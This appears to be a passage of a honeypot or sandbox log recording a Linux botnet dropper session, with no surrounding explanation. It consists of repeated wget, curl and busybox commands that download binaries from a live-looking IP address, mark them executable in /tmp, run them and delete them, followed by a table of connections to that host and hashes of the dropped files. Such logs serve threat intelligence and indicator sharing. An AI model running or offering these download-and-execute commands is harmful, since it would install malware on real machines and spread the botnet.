[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |